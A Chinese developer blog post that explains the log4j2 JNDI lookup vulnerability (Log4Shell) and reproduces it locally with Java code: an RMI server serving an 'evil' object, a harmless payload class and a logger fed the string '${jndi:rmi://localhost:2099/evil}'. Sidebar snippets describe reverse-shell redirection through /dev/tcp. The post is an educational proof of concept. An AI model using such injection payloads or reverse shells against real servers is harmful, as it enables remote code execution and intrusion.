log4j2 漏洞模拟

最新推荐文章于 2024-05-16 05:10:30 发布
最新推荐文章于 2024-05-16 05:10:30 发布
阅读量2.6k 收藏 1
点赞数
分类专栏: Java 分布式 文章标签: 安全 log4j2 log4j RMI java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011060911/article/details/121910709
版权

一夜之间到处都是 log4j2 的漏洞,公司的群里也收到了紧急通知,要求立刻修复!修复方式相信大家都清楚,升级 log4j2 版本或者通过一些参数来禁用 lookup 功能等,就不过多叙述了,本文主要带大家看一下这个漏洞到底是怎么回事,通过代码来简单模拟下这个漏洞。

lookup 功能

log4j 提供了 lookup 功能,通过lookup 你可以在你的log4j 配置文件中添加你的变量值。最简单的你配置日志使用的日期格式 $${date:yyyy-MM} 就是通过date lookup 功能实现的。此外还有很多的lookup,比如 docker-lookup、env-lookup 等。

lookup 功能使得日志的配置更加灵活,但是提供的 Jndi lookup  却暴露了重大的漏洞。

通过 jndi 你可以远程访问很多服务或接口。比如 ldap 、 RMI、CORBA 等,jndi-lookup 结合 jndi 和 lookup 这就带来了远程不可控的风险。

下面就通过 RMI 来模拟本次漏洞。

准备工作

1. build.gradle 文件,添加配置:

    implementation group: 'org.apache.logging.log4j', name: 'log4j-api', version: '2.14.1'
    implementation group: 'org.apache.logging.log4j', name: 'log4j-core', version: '2.14.1'

2. 通过RMI 暴露一个远程恶意后台服务,并启动

public class RemoteServer {
    public static void main(String[] args) {
        try {

            System.out.println(System.getSecurityManager() == null);
            if (System.getSecurityManager() == null) {
                System.setSecurityManager(new SecurityManager());
            }


            LocateRegistry.createRegistry(2099);
            Registry registry = LocateRegistry.getRegistry(2099);


            Reference ref = new Reference("top.lovelily.remote.EvilObject", "top.lovelily.remote.EvilObject", null);
            ReferenceWrapper remote = new ReferenceWrapper(ref);

            registry.rebind("evil", remote);
            System.out.println("启动 RMI 服务端");
        } catch (Exception e) {
            e.printStackTrace();
        }


    }
}

远程恶意代码,很简单就是执行一个静态代码块:

public class EvilObject implements ObjectFactory {
    static {
        System.out.println("执行恶意代码!");
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}

3. 下面模拟公司服务器打印输入参数

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LocalServer {
    private static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        String input = "${jndi:rmi://localhost:2099/evil}";
        logger.info("hello1 {}", input);
    }
}

由于用户输入是任意的,攻击者写好攻击代码后,恶意输入代码中内容。就会在本地服务器执行远程恶意代码:

如果觉得还不错的话,关注、分享、在看(关注不失联~), 原创不易,且看且珍惜~

 

【非典型Coder】
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
log4j2漏洞原理详解、漏洞复现及漏洞利用
Cwillchris的博客
03-13 1362
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。
log4j远程注入漏洞模拟和详解
zchlove137的博客
12-21 4494
IT之家 12 月 10 日消息,近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。IT之家获悉,由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊.
模拟Log4j输出信息
Duanc 的博客
08-21 539
模拟Log4j输出信息
探索BadLibrary:一个安全漏洞模拟库的创新实践
gitblog_00003的博客
04-21 223
探索BadLibrary:一个安全漏洞模拟库的创新实践 项目地址:https://gitcode.com/SecureSkyTechnology/BadLibrary 在软件开发中,理解和预防安全漏洞是至关重要的。BadLibrary 是一个精心设计的项目,它提供了一系列含有常见编程错误和安全漏洞的代码示例。通过这个项目,开发者可以学习如何识别并修复这些隐患,从而提升他们的安全编码能力。 项目简...
log4j2 远程代码执行漏洞
811
12-10 5363
本地稳定复现 无效的措施 3台机器2win 1linux 提供思路 关闭lookup 将log4j.xml里面的 %m %msg %message 替换为 %message{nolookups} %msg{nolookups} %m{nolookups}
反序列化漏洞模拟
IT从业者
12-17 436
反序列化漏洞模拟
log4j漏洞排查小工具
12-20
3. **漏洞模拟测试**:通过发送特定的测试请求,模拟攻击行为,验证系统是否易受Log4j漏洞影响。 4. **修复建议**:提供针对检测到的漏洞的修复步骤,如更新Log4j安全版本,或者提供临时禁用漏洞利用的方法。 5....
log4j漏洞靶场docker-compose.zip
01-14
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
log4j确认修复工具及源码
01-22
然而,2021年底,Log4j2被发现存在一个严重的安全漏洞,被称为CVE-2021-44228,也就是著名的"Log4Shell"漏洞。这个漏洞允许远程攻击者通过注入恶意代码来执行任意系统命令,对网络安全构成了重大威胁。 "Log4j确认...
log4j.zip 1.2系列合集
07-09
随着技术的发展,Log4j已经更新到了2.x系列,带来了更多的特性,如异步日志记录、更丰富的日志级别、插件体系等。然而,1.2系列仍然在许多老项目中使用,理解其工作原理和配置方式对于维护这些系统至关重要。 综上...
log4j-1.2.16.jar
10-13
此外,log4j-1.2系列曾出现过安全漏洞,例如著名的Log4Shell漏洞,虽然1.2.16版本不直接受影响,但建议升级至更安全的版本。 五、实际应用 在实际开发中,我们可以在代码中通过Logger类创建和使用日志,例如: ``...
漏洞扫描模拟攻击方法实验
12-14
漏洞扫描模拟攻击方法实验漏洞扫描模拟攻击方法实验
Log4j2远程执行代码漏洞如何攻击? 又如何修复
琦彦
01-06 9182
Log4j2远程执行代码漏洞如何攻击? 又如何修复
下一波Log4J攻击来势汹汹
m0_65135736的博客
12-29 2063
到目前为止,Log4Shell的影响主要在于加密货币挖矿和少数间谍活动,而真正的灾难就在眼前。 一周前,互联网经历了一场地震。由于广为使用的开源库Log4j存在一个漏洞,世界各地的大量服务器瞬间暴露在并不高明的攻击手段之下。第一波黑客攻击已经全面铺开,但接下来的走势才是更需要担心的。 到目前为止,Log4j黑客的先锋队主要是加密货币挖矿软件,这些恶意软件从受影响的系统中抽取资源来挖取加密货币。根据微软和其他公司的近期报告,一些民族国家的间谍也涉足其中。近两年来常见的敲诈行为、勒索软件和破坏性攻击在本次事
Log4j 漏洞测试(1)
最新发布
2401_84715880的博客
05-16 393
克隆代码到本地,打包,target 目录下会生成2、新建一个普通的 java 类,等会将此类注入到待测试的项目中。可以随便写逻辑 (生成文件、定时关机等)示例: 功能是在windows系统下,3600秒后关机/***/try {3、对上面的类执行 javac 编译,然后启动一个http 服务器,能通过服务器访问到编译后的 class 文件示例: 使用python,我编译后的class文件在目录下。在 cmd窗口运行以下命令。
解决Apache Log4j2漏洞通用方案(最新&亲测有效)
热门推荐
weixin_43548310的博客
12-13 1万+
通用的Apache Log4j2漏洞最佳方案,赶紧冲冲冲!
org.apache.logging.log4j.Logger
07-23 1万+
log4j2日志整合到slf4j统一输出,slf4j没有提供桥接包,但是log4j2提供了,原理是一样的,首先引入log4j2的桥接包: <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-to-slf4j</artifactId> <version>2.6.2</ver
spring5.0版本 log4j报错 解决方法
qq_40181546的博客
10-21 1058
<dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-api</artifactId> <version>2.11.0</version> </dependency> <!--log4j-core --> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-core</a
apache log4j2漏洞
01-13
然而,最近发现了一个严重的漏洞,被称为Apache Log4j2远程代码执行漏洞。该漏洞允许攻击者通过精心构造的日志消息触发远程代码执行,从而完全控制受影响的应用程序。 攻击者可以通过在日志消息中插入恶意的Java...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

【非典型Coder】

赏个鸡腿吧

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值